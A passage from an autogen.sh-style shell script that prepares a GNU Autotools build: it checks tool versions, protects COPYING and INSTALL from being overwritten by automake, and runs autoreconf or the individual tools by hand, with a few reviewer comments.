PROJECT="`grep AM_INIT_AUTOMAKE $CONFIGURE | grep -v '.*#.*AM_INIT_AUTOMAKE' | tail -${TAIL_N}1 | sed 's/^[ ]*AM_INIT_AUTOMAKE(\([^,)]*\).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
fi
# fall back to a generic name if neither macro yielded one
if [ "x$PROJECT" = "xAM_INIT_AUTOMAKE" ] ; then
PROJECT="project"
fi
if [ "x$PROJECT" = "x" ] ; then
PROJECT="project"
fi
else
$ECHO "Using PROJECT environment variable override: $PROJECT"
fi
$ECHO "Preparing the $PROJECT build system...please wait"
$ECHO
########################
# check for autoreconf #
########################
# Detect whether autoreconf is runnable; record the result in
# HAVE_AUTORECONF.  An AUTORECONF environment override is trusted as-is.
HAVE_AUTORECONF=no
if [ "x$AUTORECONF" = "x" ] ; then
for AUTORECONF in autoreconf ; do
$VERBOSE_ECHO "Checking autoreconf version: $AUTORECONF --version"
$AUTORECONF --version > /dev/null 2>&1
if [ $? = 0 ] ; then
HAVE_AUTORECONF=yes
break
fi
done
else
HAVE_AUTORECONF=yes
$ECHO "Using AUTORECONF environment variable override: $AUTORECONF"
fi
##########################
# autoconf version check #
##########################
# Locate autoconf and verify it meets $AUTOCONF_VERSION; exit via
# version_error otherwise.
_acfound=no
if [ "x$AUTOCONF" = "x" ] ; then
for AUTOCONF in autoconf ; do
$VERBOSE_ECHO "Checking autoconf version: $AUTOCONF --version"
$AUTOCONF --version > /dev/null 2>&1
if [ $? = 0 ] ; then
_acfound=yes
break
fi
done
else
_acfound=yes
$ECHO "Using AUTOCONF environment variable override: $AUTOCONF"
fi
_report_error=no
if [ ! "x$_acfound" = "xyes" ] ; then
$ECHO "ERROR: Unable to locate GNU Autoconf."
_report_error=yes
else
# first numeric token of the --version banner
_version="`$AUTOCONF --version | head -${HEAD_N}1 | sed 's/[^0-9]*\([0-9\.][0-9\.]*\)/\1/'`"
if [ "x$_version" = "x" ] ; then
_version="0.0.0"
fi
$ECHO "Found GNU Autoconf version $_version"
version_check "$AUTOCONF_VERSION" "$_version"
if [ $? -ne 0 ] ; then
_report_error=yes
fi
fi
if [ "x$_report_error" = "xyes" ] ; then
version_error "$AUTOCONF_VERSION" "GNU Autoconf"
exit 1
fi
##########################
# automake version check #
##########################
# Locate automake and verify it meets $AUTOMAKE_VERSION; exit via
# version_error otherwise.
_amfound=no
if [ "x$AUTOMAKE" = "x" ] ; then
for AUTOMAKE in automake ; do
$VERBOSE_ECHO "Checking automake version: $AUTOMAKE --version"
$AUTOMAKE --version > /dev/null 2>&1
if [ $? = 0 ] ; then
_amfound=yes
break
fi
done
else
_amfound=yes
$ECHO "Using AUTOMAKE environment variable override: $AUTOMAKE"
fi
_report_error=no
if [ ! "x$_amfound" = "xyes" ] ; then
$ECHO
$ECHO "ERROR: Unable to locate GNU Automake."
_report_error=yes
else
# first numeric token of the --version banner
_version="`$AUTOMAKE --version | head -${HEAD_N}1 | sed 's/[^0-9]*\([0-9\.][0-9\.]*\)/\1/'`"
if [ "x$_version" = "x" ] ; then
_version="0.0.0"
fi
$ECHO "Found GNU Automake version $_version"
version_check "$AUTOMAKE_VERSION" "$_version"
if [ $? -ne 0 ] ; then
_report_error=yes
fi
fi
if [ "x$_report_error" = "xyes" ] ; then
version_error "$AUTOMAKE_VERSION" "GNU Automake"
exit 1
fi
########################
# check for libtoolize #
########################
# Locate libtoolize (or a platform alternate such as macOS glibtoolize) and
# verify it meets $LIBTOOL_VERSION; exit via version_error otherwise.
HAVE_LIBTOOLIZE=yes
HAVE_ALT_LIBTOOLIZE=no
_ltfound=no
if [ "x$LIBTOOLIZE" = "x" ] ; then
LIBTOOLIZE=libtoolize
$VERBOSE_ECHO "Checking libtoolize version: $LIBTOOLIZE --version"
$LIBTOOLIZE --version > /dev/null 2>&1
if [ ! $? = 0 ] ; then
HAVE_LIBTOOLIZE=no
$ECHO
if [ "x$HAVE_AUTORECONF" = "xno" ] ; then
$ECHO "Warning: libtoolize does not appear to be available."
else
$ECHO "Warning: libtoolize does not appear to be available. This means that"
$ECHO "the automatic build preparation via autoreconf will probably not work."
$ECHO "Preparing the build by running each step individually, however, should"
$ECHO "work and will be done automatically for you if autoreconf fails."
fi
# look for some alternates
for tool in glibtoolize libtoolize15 libtoolize14 libtoolize13 ; do
$VERBOSE_ECHO "Checking libtoolize alternate: $tool --version"
_glibtoolize="`$tool --version > /dev/null 2>&1`"
if [ $? = 0 ] ; then
$VERBOSE_ECHO "Found $tool --version"
# validate that the alternate resolves to a real file in a real directory
_glti="`which $tool`"
if [ "x$_glti" = "x" ] ; then
$VERBOSE_ECHO "Cannot find $tool with which"
continue;
fi
if test ! -f "$_glti" ; then
$VERBOSE_ECHO "Cannot use $tool, $_glti is not a file"
continue;
fi
_gltidir="`dirname $_glti`"
if [ "x$_gltidir" = "x" ] ; then
$VERBOSE_ECHO "Cannot find $tool path with dirname of $_glti"
continue;
fi
if test ! -d "$_gltidir" ; then
$VERBOSE_ECHO "Cannot use $tool, $_gltidir is not a directory"
continue;
fi
HAVE_ALT_LIBTOOLIZE=yes
LIBTOOLIZE="$tool"
$ECHO
$ECHO "Fortunately, $tool was found which means that your system may simply"
$ECHO "have a non-standard or incomplete GNU Autotools install. If you have"
$ECHO "sufficient system access, it may be possible to quell this warning by"
$ECHO "running:"
$ECHO
# suggest sudo only when it is available
sudo -V > /dev/null 2>&1
if [ $? = 0 ] ; then
$ECHO " sudo ln -s $_glti $_gltidir/libtoolize"
$ECHO
else
$ECHO " ln -s $_glti $_gltidir/libtoolize"
$ECHO
$ECHO "Run that as root or with proper permissions to the $_gltidir directory"
$ECHO
fi
_ltfound=yes
break
fi
done
else
_ltfound=yes
fi
else
_ltfound=yes
$ECHO "Using LIBTOOLIZE environment variable override: $LIBTOOLIZE"
fi
############################
# libtoolize version check #
############################
_report_error=no
if [ ! "x$_ltfound" = "xyes" ] ; then
$ECHO
$ECHO "ERROR: Unable to locate GNU Libtool."
_report_error=yes
else
# first numeric token of the --version banner
_version="`$LIBTOOLIZE --version | head -${HEAD_N}1 | sed 's/[^0-9]*\([0-9\.][0-9\.]*\)/\1/'`"
if [ "x$_version" = "x" ] ; then
_version="0.0.0"
fi
$ECHO "Found GNU Libtool version $_version"
version_check "$LIBTOOL_VERSION" "$_version"
if [ $? -ne 0 ] ; then
_report_error=yes
fi
fi
if [ "x$_report_error" = "xyes" ] ; then
version_error "$LIBTOOL_VERSION" "GNU Libtool"
exit 1
fi
#####################
# check for aclocal #
#####################
# Detect aclocal (no minimum-version requirement; it ships with automake,
# which was already version-checked above).
if [ "x$ACLOCAL" = "x" ] ; then
for ACLOCAL in aclocal ; do
$VERBOSE_ECHO "Checking aclocal version: $ACLOCAL --version"
$ACLOCAL --version > /dev/null 2>&1
if [ $? = 0 ] ; then
break
fi
done
else
$ECHO "Using ACLOCAL environment variable override: $ACLOCAL"
fi
########################
# check for autoheader #
########################
if [ "x$AUTOHEADER" = "x" ] ; then
for AUTOHEADER in autoheader ; do
$VERBOSE_ECHO "Checking autoheader version: $AUTOHEADER --version"
$AUTOHEADER --version > /dev/null 2>&1
if [ $? = 0 ] ; then
break
fi
done
else
$ECHO "Using AUTOHEADER environment variable override: $AUTOHEADER"
fi
#########################
# check if version only #
#########################
$VERBOSE_ECHO "Checking whether to only output version information"
if [ "x$VERSION_ONLY" = "xyes" ] ; then
$ECHO
ident
$ECHO "---"
$ECHO "Version requested. No preparation or configuration will be performed."
exit 0
fi
#################################
# PROTECT_FROM_CLOBBER FUNCTION #
#################################
# protect_from_clobber: back up COPYING and INSTALL in the current directory
# (as <file>.$$.protect_from_automake.backup) so they can be restored after
# automake -f overwrites them.  Sets PFC_INIT=1 so the EXIT trap knows a
# restore pass is needed.
protect_from_clobber ( ) {
PFC_INIT=1
# protect COPYING & INSTALL from overwrite by automake. the
# automake force option will (inappropriately) ignore the existing
# contents of a COPYING and/or INSTALL files (depending on the
# version) instead of just forcing *missing* files like it does
# for AUTHORS, NEWS, and README. this is broken but extremely
# prevalent behavior, so we protect against it by keeping a backup
# of the file that can later be restored.
if test -f COPYING ; then
if test -f COPYING.$$.protect_from_automake.backup ; then
$VERBOSE_ECHO "Already backed up COPYING in `pwd`"
else
$VERBOSE_ECHO "Backing up COPYING in `pwd`"
$VERBOSE_ECHO "cp -p COPYING COPYING.$$.protect_from_automake.backup"
cp -p COPYING COPYING.$$.protect_from_automake.backup
fi
fi
if test -f INSTALL ; then
if test -f INSTALL.$$.protect_from_automake.backup ; then
$VERBOSE_ECHO "Already backed up INSTALL in `pwd`"
else
$VERBOSE_ECHO "Backing up INSTALL in `pwd`"
$VERBOSE_ECHO "cp -p INSTALL INSTALL.$$.protect_from_automake.backup"
cp -p INSTALL INSTALL.$$.protect_from_automake.backup
fi
fi
}
##############################
# RECURSIVE_PROTECT FUNCTION #
##############################
recursive_protect ( ) {

    # for projects using recursive configure, run the build
    # preparation steps for the subdirectories. this function assumes
    # START_PATH was set to pwd before recursion begins so that
    # relative paths work.

    # git 'r done, protect COPYING and INSTALL from being clobbered
    protect_from_clobber

    if test -d autom4te.cache ; then
        $VERBOSE_ECHO "Found an autom4te.cache directory, deleting it"
        $VERBOSE_ECHO "rm -rf autom4te.cache"
        rm -rf autom4te.cache
    fi

    # find configure template
    _configure="`locate_configure_template`"
    if [ "x$_configure" = "x" ] ; then
        return
    fi
    # $VERBOSE_ECHO "Looking for configure template found `pwd`/$_configure"

    # look for subdirs
    # $VERBOSE_ECHO "Looking for subdirs in `pwd`"
    # Pull the AC_CONFIG_SUBDIRS argument(s) out of the template, skipping
    # commented occurrences and stripping any m4 quote brackets.
    _det_config_subdirs="`grep AC_CONFIG_SUBDIRS $_configure | grep -v '.*#.*AC_CONFIG_SUBDIRS' | sed 's/^[ ]*AC_CONFIG_SUBDIRS(\(.*\)).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
    CHECK_DIRS=""
    for dir in $_det_config_subdirs ; do
        if test -d "`pwd`/$dir" ; then
            CHECK_DIRS="$CHECK_DIRS \"`pwd`/$dir\""
        fi
    done

    # process subdirs
    if [ ! "x$CHECK_DIRS" = "x" ] ; then
        $VERBOSE_ECHO "Recursively scanning the following directories:"
        $VERBOSE_ECHO " $CHECK_DIRS"
        for dir in $CHECK_DIRS ; do
            $VERBOSE_ECHO "Protecting files from automake in $dir"
            cd "$START_PATH"
            # eval so the embedded escaped quotes in CHECK_DIRS entries are honored
            eval "cd $dir"

            # recursively git 'r done
            recursive_protect
        done
    fi
} # end of recursive_protect
#############################
# RESTORE_CLOBBERED FUNCION #
#############################
restore_clobbered ( ) {

    # The automake (and autoreconf by extension) -f/--force-missing
    # option may overwrite COPYING and INSTALL even if they do exist.
    # Here we restore the files if necessary.

    spacer=no

    # COPYING
    if test -f COPYING.$$.protect_from_automake.backup ; then
        if test -f COPYING ; then
            # compare entire content, restore if needed
            if test "x`cat COPYING`" != "x`cat COPYING.$$.protect_from_automake.backup`" ; then
                if test "x$spacer" = "xno" ; then
                    $VERBOSE_ECHO
                    spacer=yes
                fi
                # restore the backup
                $VERBOSE_ECHO "Restoring COPYING from backup (automake -f likely clobbered it)"
                $VERBOSE_ECHO "rm -f COPYING"
                rm -f COPYING
                $VERBOSE_ECHO "mv COPYING.$$.protect_from_automake.backup COPYING"
                mv COPYING.$$.protect_from_automake.backup COPYING
            fi # check contents
        elif test -f COPYING.$$.protect_from_automake.backup ; then
            # NOTE(review): this elif re-tests the condition already known true
            # from the enclosing if; redundant but harmless.
            $VERBOSE_ECHO "mv COPYING.$$.protect_from_automake.backup COPYING"
            mv COPYING.$$.protect_from_automake.backup COPYING
        fi # -f COPYING

        # just in case
        $VERBOSE_ECHO "rm -f COPYING.$$.protect_from_automake.backup"
        rm -f COPYING.$$.protect_from_automake.backup
    fi # -f COPYING.$$.protect_from_automake.backup

    # INSTALL
    if test -f INSTALL.$$.protect_from_automake.backup ; then
        if test -f INSTALL ; then
            # compare entire content, restore if needed
            if test "x`cat INSTALL`" != "x`cat INSTALL.$$.protect_from_automake.backup`" ; then
                if test "x$spacer" = "xno" ; then
                    $VERBOSE_ECHO
                    spacer=yes
                fi
                # restore the backup
                $VERBOSE_ECHO "Restoring INSTALL from backup (automake -f likely clobbered it)"
                $VERBOSE_ECHO "rm -f INSTALL"
                rm -f INSTALL
                $VERBOSE_ECHO "mv INSTALL.$$.protect_from_automake.backup INSTALL"
                mv INSTALL.$$.protect_from_automake.backup INSTALL
            fi # check contents
        elif test -f INSTALL.$$.protect_from_automake.backup ; then
            # NOTE(review): redundant re-test, same pattern as the COPYING branch.
            $VERBOSE_ECHO "mv INSTALL.$$.protect_from_automake.backup INSTALL"
            mv INSTALL.$$.protect_from_automake.backup INSTALL
        fi # -f INSTALL

        # just in case
        $VERBOSE_ECHO "rm -f INSTALL.$$.protect_from_automake.backup"
        rm -f INSTALL.$$.protect_from_automake.backup
    fi # -f INSTALL.$$.protect_from_automake.backup

    # also drop the .backup copies of the auxiliary scripts that were moved
    # aside earlier (config.guess/config.sub/ltmain.sh)
    CONFIGURE="`locate_configure_template`"
    if [ "x$CONFIGURE" = "x" ] ; then
        return
    fi

    _aux_dir="`grep AC_CONFIG_AUX_DIR $CONFIGURE | grep -v '.*#.*AC_CONFIG_AUX_DIR' | tail -${TAIL_N}1 | sed 's/^[ ]*AC_CONFIG_AUX_DIR(\(.*\)).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
    if test ! -d "$_aux_dir" ; then
        _aux_dir=.
    fi
    for file in config.guess config.sub ltmain.sh ; do
        if test -f "${_aux_dir}/${file}" ; then
            $VERBOSE_ECHO "rm -f \"${_aux_dir}/${file}.backup\""
            rm -f "${_aux_dir}/${file}.backup"
        fi
    done
} # end of restore_clobbered
##############################
# RECURSIVE_RESTORE FUNCTION #
##############################
recursive_restore ( ) {

    # restore COPYING and INSTALL from backup if they were clobbered
    # for each directory recursively.

    # git 'r undone
    restore_clobbered

    # find configure template
    _configure="`locate_configure_template`"
    if [ "x$_configure" = "x" ] ; then
        return
    fi

    # look for subdirs (same AC_CONFIG_SUBDIRS extraction as recursive_protect)
    _det_config_subdirs="`grep AC_CONFIG_SUBDIRS $_configure | grep -v '.*#.*AC_CONFIG_SUBDIRS' | sed 's/^[ ]*AC_CONFIG_SUBDIRS(\(.*\)).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
    CHECK_DIRS=""
    for dir in $_det_config_subdirs ; do
        if test -d "`pwd`/$dir" ; then
            CHECK_DIRS="$CHECK_DIRS \"`pwd`/$dir\""
        fi
    done

    # process subdirs
    if [ ! "x$CHECK_DIRS" = "x" ] ; then
        $VERBOSE_ECHO "Recursively scanning the following directories:"
        $VERBOSE_ECHO " $CHECK_DIRS"
        for dir in $CHECK_DIRS ; do
            $VERBOSE_ECHO "Checking files for automake damage in $dir"
            cd "$START_PATH"
            # eval so the embedded escaped quotes in CHECK_DIRS entries are honored
            eval "cd $dir"

            # recursively git 'r undone
            recursive_restore
        done
    fi
} # end of recursive_restore
#######################
# INITIALIZE FUNCTION #
#######################
initialize ( ) {

    # this routine performs a variety of directory-specific
    # initializations. some are sanity checks, some are preventive,
    # and some are necessary setup detection.
    #
    # this function sets:
    #   CONFIGURE
    #   SEARCH_DIRS
    #   CONFIG_SUBDIRS

    ##################################
    # check for a configure template #
    ##################################
    CONFIGURE="`locate_configure_template`"
    if [ "x$CONFIGURE" = "x" ] ; then
        $ECHO
        $ECHO "A configure.ac or configure.in file could not be located implying"
        $ECHO "that the GNU Build System is at least not used in this directory. In"
        $ECHO "any case, there is nothing to do here without one of those files."
        $ECHO
        $ECHO "ERROR: No configure.in or configure.ac file found in `pwd`"
        exit 1
    fi

    #####################
    # detect an aux dir #
    #####################
    # AC_CONFIG_AUX_DIR names where config.guess/config.sub/ltmain.sh live;
    # fall back to the current directory when unset or not a directory.
    _aux_dir="`grep AC_CONFIG_AUX_DIR $CONFIGURE | grep -v '.*#.*AC_CONFIG_AUX_DIR' | tail -${TAIL_N}1 | sed 's/^[ ]*AC_CONFIG_AUX_DIR(\(.*\)).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
    if test ! -d "$_aux_dir" ; then
        _aux_dir=.
    else
        $VERBOSE_ECHO "Detected auxillary directory: $_aux_dir"
    fi

    ################################
    # detect a recursive configure #
    ################################
    CONFIG_SUBDIRS=""
    _det_config_subdirs="`grep AC_CONFIG_SUBDIRS $CONFIGURE | grep -v '.*#.*AC_CONFIG_SUBDIRS' | sed 's/^[ ]*AC_CONFIG_SUBDIRS(\(.*\)).*/\1/' | sed 's/.*\[\(.*\)\].*/\1/'`"
    for dir in $_det_config_subdirs ; do
        if test -d "`pwd`/$dir" ; then
            $VERBOSE_ECHO "Detected recursive configure directory: `pwd`/$dir"
            CONFIG_SUBDIRS="$CONFIG_SUBDIRS `pwd`/$dir"
        fi
    done

    ##########################################
    # make sure certain required files exist #
    ##########################################
    # empty placeholders are sufficient to keep the tools happy
    for file in AUTHORS COPYING ChangeLog INSTALL NEWS README ; do
        if test ! -f $file ; then
            $VERBOSE_ECHO "Touching ${file} since it does not exist"
            touch $file
        fi
    done

    ##################################################
    # make sure certain generated files do not exist #
    ##################################################
    # move them aside so the tools regenerate fresh copies;
    # restore_clobbered cleans up the .backup copies afterwards
    for file in config.guess config.sub ltmain.sh ; do
        if test -f "${_aux_dir}/${file}" ; then
            $VERBOSE_ECHO "mv -f \"${_aux_dir}/${file}\" \"${_aux_dir}/${file}.backup\""
            mv -f "${_aux_dir}/${file}" "${_aux_dir}/${file}.backup"
        fi
    done

    ############################
    # search alternate m4 dirs #
    ############################
    SEARCH_DIRS=""
    for dir in m4 ; do
        if [ -d $dir ] ; then
            $VERBOSE_ECHO "Found extra aclocal search directory: $dir"
            SEARCH_DIRS="$SEARCH_DIRS -I $dir"
        fi
    done

    ######################################
    # remove any previous build products #
    ######################################
    if test -d autom4te.cache ; then
        $VERBOSE_ECHO "Found an autom4te.cache directory, deleting it"
        $VERBOSE_ECHO "rm -rf autom4te.cache"
        rm -rf autom4te.cache
    fi
    # tcl/tk (and probably others) have a customized aclocal.m4, so can't delete it
    # if test -f aclocal.m4 ; then
    #     $VERBOSE_ECHO "Found an aclocal.m4 file, deleting it"
    #     $VERBOSE_ECHO "rm -f aclocal.m4"
    #     rm -f aclocal.m4
    # fi
} # end of initialize()
##############
# initialize #
##############

# stash path
START_PATH="`pwd`"

# Before running autoreconf or manual steps, some prep detection work
# is necessary or useful. Only needs to occur once per directory, but
# does need to traverse the entire subconfigure hierarchy to protect
# files from being clobbered even by autoreconf.
recursive_protect

# start from where we started
cd "$START_PATH"

# get ready to process
initialize

############################################
# prepare build via autoreconf or manually #
############################################
# Try autoreconf first; fall back to running the individual tools by hand
# (manual_autogen below) whenever autoreconf is unavailable or fails.
reconfigure_manually=no
if [ "x$HAVE_AUTORECONF" = "xyes" ] ; then
    $ECHO
    $ECHO $ECHO_N "Automatically preparing build ... $ECHO_C"

    $VERBOSE_ECHO "$AUTORECONF $SEARCH_DIRS $AUTORECONF_OPTIONS"
    autoreconf_output="`$AUTORECONF $SEARCH_DIRS $AUTORECONF_OPTIONS 2>&1`"
    ret=$?
    $VERBOSE_ECHO "$autoreconf_output"

    if [ ! $ret = 0 ] ; then
        if [ "x$HAVE_ALT_LIBTOOLIZE" = "xyes" ] ; then
            # A renamed libtoolize (e.g. glibtoolize) is a common cause of
            # autoreconf failure; restart ourselves once with LIBTOOLIZE set.
            if [ ! "x`echo \"$autoreconf_output\" | grep libtoolize | grep \"No such file or directory\"`" = "x" ] ; then
                $ECHO
                $ECHO "Warning: autoreconf failed but due to what is usually a common libtool"
                $ECHO "misconfiguration issue. This problem is encountered on systems that"
                $ECHO "have installed libtoolize under a different name without providing a"
                $ECHO "symbolic link or without setting the LIBTOOLIZE environment variable."
                $ECHO
                $ECHO "Restarting the preparation steps with LIBTOOLIZE set to $LIBTOOLIZE"

                export LIBTOOLIZE
                RUN_RECURSIVE=no
                export RUN_RECURSIVE
                untrap_abnormal

                $VERBOSE_ECHO sh $AUTOGEN_SH "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" "$9"
                sh "$AUTOGEN_SH" "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" "$9"
                exit $?
            fi
        fi

        $ECHO "Warning: $AUTORECONF failed"

        if test -f ltmain.sh ; then
            $ECHO "libtoolize being run by autoreconf is not creating ltmain.sh in the auxillary directory like it should"
        fi

        $ECHO "Attempting to run the preparation steps individually"
        reconfigure_manually=yes
    fi
else
    reconfigure_manually=yes
fi
############################
# LIBTOOL_FAILURE FUNCTION #
############################
libtool_failure ( ) {

    # libtool is rather error-prone in comparison to the other
    # autotools and this routine attempts to compensate for some
    # common failures. the output after a libtoolize failure is
    # parsed for an error related to AC_PROG_LIBTOOL and if found, we
    # attempt to inject a project-provided libtool.m4 file.

    _autoconf_output="$1"

    if [ "x$RUN_RECURSIVE" = "xno" ] ; then
        # we already tried the libtool.m4, don't try again
        return 1
    fi

    if test -f "$LIBTOOL_M4" ; then
        found_libtool="`$ECHO $_autoconf_output | grep AC_PROG_LIBTOOL`"
        if test ! "x$found_libtool" = "x" ; then
            # preserve any existing acinclude.m4 before appending to it
            if test -f acinclude.m4 ; then
                rm -f acinclude.m4.$$.backup
                $VERBOSE_ECHO "cat acinclude.m4 > acinclude.m4.$$.backup"
                cat acinclude.m4 > acinclude.m4.$$.backup
            fi
            $VERBOSE_ECHO "cat \"$LIBTOOL_M4\" >> acinclude.m4"
            chmod u+w acinclude.m4
            cat "$LIBTOOL_M4" >> acinclude.m4

            # don't keep doing this
            RUN_RECURSIVE=no
            export RUN_RECURSIVE
            untrap_abnormal

            $ECHO
            $ECHO "Restarting the preparation steps with libtool macros in acinclude.m4"
            # NOTE(review): inside a shell function "$1".."$9" are the
            # function's own arguments (here $1 is the captured tool output),
            # not the script's command-line arguments -- this restart likely
            # does not pass through the user's original options. Confirm.
            $VERBOSE_ECHO sh $AUTOGEN_SH "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" "$9"
            sh "$AUTOGEN_SH" "$1" "$2" "$3" "$4" "$5" "$6" "$7" "$8" "$9"
            exit $?
        fi
    fi
}
###########################
# MANUAL_AUTOGEN FUNCTION #
###########################
manual_autogen ( ) {

    ##################################################
    # Manual preparation steps taken are as follows: #
    #   aclocal [-I m4]                              #
    #   libtoolize --automake -c -f                  #
    #   aclocal [-I m4]                              #
    #   autoconf -f                                  #
    #   autoheader                                   #
    #   automake -a -c -f                            #
    ##################################################

    ###########
    # aclocal #
    ###########
    $VERBOSE_ECHO "$ACLOCAL $SEARCH_DIRS $ACLOCAL_OPTIONS"
    aclocal_output="`$ACLOCAL $SEARCH_DIRS $ACLOCAL_OPTIONS 2>&1`"
    ret=$?
    $VERBOSE_ECHO "$aclocal_output"
    if [ ! $ret = 0 ] ; then $ECHO "ERROR: $ACLOCAL failed" && exit 2 ; fi

    ##############
    # libtoolize #
    ##############
    # libtoolize is only needed when the configure template actually uses
    # the libtool initialization macros
    need_libtoolize=no
    for feature in AC_PROG_LIBTOOL LT_INIT ; do
        $VERBOSE_ECHO "Searching for $feature in $CONFIGURE"
        found="`grep \"^$feature.*\" $CONFIGURE`"
        if [ ! "x$found" = "x" ] ; then
            need_libtoolize=yes
            break
        fi
    done
    if [ "x$need_libtoolize" = "xyes" ] ; then
        if [ "x$HAVE_LIBTOOLIZE" = "xyes" ] ; then
            $VERBOSE_ECHO "$LIBTOOLIZE $LIBTOOLIZE_OPTIONS"
            libtoolize_output="`$LIBTOOLIZE $LIBTOOLIZE_OPTIONS 2>&1`"
            ret=$?
            $VERBOSE_ECHO "$libtoolize_output"
            if [ ! $ret = 0 ] ; then $ECHO "ERROR: $LIBTOOLIZE failed" && exit 2 ; fi
        else
            if [ "x$HAVE_ALT_LIBTOOLIZE" = "xyes" ] ; then
                $VERBOSE_ECHO "$LIBTOOLIZE $ALT_LIBTOOLIZE_OPTIONS"
                libtoolize_output="`$LIBTOOLIZE $ALT_LIBTOOLIZE_OPTIONS 2>&1`"
                ret=$?
                $VERBOSE_ECHO "$libtoolize_output"
                if [ ! $ret = 0 ] ; then $ECHO "ERROR: $LIBTOOLIZE failed" && exit 2 ; fi
            fi
        fi

        ###########
        # aclocal #
        ###########
        # re-run again as instructed by libtoolize
        $VERBOSE_ECHO "$ACLOCAL $SEARCH_DIRS $ACLOCAL_OPTIONS"
        aclocal_output="`$ACLOCAL $SEARCH_DIRS $ACLOCAL_OPTIONS 2>&1`"
        ret=$?
        $VERBOSE_ECHO "$aclocal_output"

        # libtoolize might put ltmain.sh in the wrong place
        if test -f ltmain.sh ; then
            if test ! -f "${_aux_dir}/ltmain.sh" ; then
                $ECHO
                $ECHO "Warning: $LIBTOOLIZE is creating ltmain.sh in the wrong directory"
                $ECHO
                $ECHO "Fortunately, the problem can be worked around by simply copying the"
                $ECHO "file to the appropriate location (${_aux_dir}/). This has been done for you."
                $ECHO
                $VERBOSE_ECHO "cp -p ltmain.sh \"${_aux_dir}/ltmain.sh\""
                cp -p ltmain.sh "${_aux_dir}/ltmain.sh"
                $ECHO $ECHO_N "Continuing build preparation ... $ECHO_C"
            fi
        fi # ltmain.sh
    fi # need_libtoolize

    ############
    # autoconf #
    ############
    $VERBOSE_ECHO
    $VERBOSE_ECHO "$AUTOCONF $AUTOCONF_OPTIONS"
    autoconf_output="`$AUTOCONF $AUTOCONF_OPTIONS 2>&1`"
    ret=$?
    $VERBOSE_ECHO "$autoconf_output"

    if [ ! $ret = 0 ] ; then
        # retry without the -f and check for usage of macros that are too new
        # (each list holds macros first available in that autoconf release)
        ac2_59_macros="AC_C_RESTRICT AC_INCLUDES_DEFAULT AC_LANG_ASSERT AC_LANG_WERROR AS_SET_CATFILE"
        ac2_55_macros="AC_COMPILER_IFELSE AC_FUNC_MBRTOWC AC_HEADER_STDBOOL AC_LANG_CONFTEST AC_LANG_SOURCE AC_LANG_PROGRAM AC_LANG_CALL AC_LANG_FUNC_TRY_LINK AC_MSG_FAILURE AC_PREPROC_IFELSE"
        ac2_54_macros="AC_C_BACKSLASH_A AC_CONFIG_LIBOBJ_DIR AC_GNU_SOURCE AC_PROG_EGREP AC_PROG_FGREP AC_REPLACE_FNMATCH AC_FUNC_FNMATCH_GNU AC_FUNC_REALLOC AC_TYPE_MBSTATE_T"

        macros_to_search=""
        # split "major.minor" out of the detected autoconf version string
        ac_major="`echo ${AUTOCONF_VERSION}. | cut -d. -f1 | sed 's/[^0-9]//g'`"
        ac_minor="`echo ${AUTOCONF_VERSION}. | cut -d. -f2 | sed 's/[^0-9]//g'`"

        if [ $ac_major -lt 2 ] ; then
            macros_to_search="$ac2_59_macros $ac2_55_macros $ac2_54_macros"
        else
            if [ $ac_minor -lt 54 ] ; then
                macros_to_search="$ac2_59_macros $ac2_55_macros $ac2_54_macros"
            elif [ $ac_minor -lt 55 ] ; then
                macros_to_search="$ac2_59_macros $ac2_55_macros"
            elif [ $ac_minor -lt 59 ] ; then
                macros_to_search="$ac2_59_macros"
            fi
        fi

        configure_ac_macros=__none__
        for feature in $macros_to_search ; do
            $VERBOSE_ECHO "Searching for $feature in $CONFIGURE"
            found="`grep \"^$feature.*\" $CONFIGURE`"
            if [ ! "x$found" = "x" ] ; then
                if [ "x$configure_ac_macros" = "x__none__" ] ; then
                    configure_ac_macros="$feature"
                else
                    configure_ac_macros="$feature $configure_ac_macros"
                fi
            fi
        done
        if [ ! "x$configure_ac_macros" = "x__none__" ] ; then
            $ECHO
            $ECHO "Warning: Unsupported macros were found in $CONFIGURE"
            $ECHO
            $ECHO "The `echo $CONFIGURE | basename` file was scanned in order to determine if any"
            $ECHO "unsupported macros are used that exceed the minimum version"
            $ECHO "settings specified within this file. As such, the following macros"
            $ECHO "should be removed from configure.ac or the version numbers in this"
            $ECHO "file should be increased:"
            $ECHO
            $ECHO "$configure_ac_macros"
            $ECHO
            $ECHO $ECHO_N "Ignorantly continuing build preparation ... $ECHO_C"
        fi

        ###################
        # autoconf, retry #
        ###################
        $VERBOSE_ECHO
        $VERBOSE_ECHO "$AUTOCONF"
        autoconf_output="`$AUTOCONF 2>&1`"
        ret=$?
        $VERBOSE_ECHO "$autoconf_output"

        if [ ! $ret = 0 ] ; then
            # test if libtool is busted
            libtool_failure "$autoconf_output"

            # let the user know what went wrong
            cat <<EOF
$autoconf_output
EOF
            $ECHO "ERROR: $AUTOCONF failed"
            exit 2
        else
            # autoconf sans -f and possibly sans unsupported options succeed so warn verbosely
            $ECHO
            $ECHO "Warning: autoconf seems to have succeeded by removing the following options:"
            $ECHO " AUTOCONF_OPTIONS=\"$AUTOCONF_OPTIONS\""
            $ECHO
            $ECHO "Removing those options should not be necessary and indicate some other"
            $ECHO "problem with the build system. The build preparation is highly suspect"
            $ECHO "and may result in configuration or compilation errors. Consider"
            if [ "x$VERBOSE_ECHO" = "x:" ] ; then
                $ECHO "rerunning the build preparation with verbose output enabled."
                $ECHO " $AUTOGEN_SH --verbose"
            else
                $ECHO "reviewing the minimum GNU Autotools version settings contained in"
                $ECHO "this script along with the macros being used in your `echo $CONFIGURE | basename` file."
            fi
            $ECHO
            $ECHO $ECHO_N "Continuing build preparation ... $ECHO_C"
        fi # autoconf ret = 0
    fi # autoconf ret = 0

    ##############
    # autoheader #
    ##############
    # autoheader is only needed when configure declares a config header
    need_autoheader=no
    for feature in AM_CONFIG_HEADER AC_CONFIG_HEADER ; do
        $VERBOSE_ECHO "Searching for $feature in $CONFIGURE"
        found="`grep \"^$feature.*\" $CONFIGURE`"
        if [ ! "x$found" = "x" ] ; then
            need_autoheader=yes
            break
        fi
    done
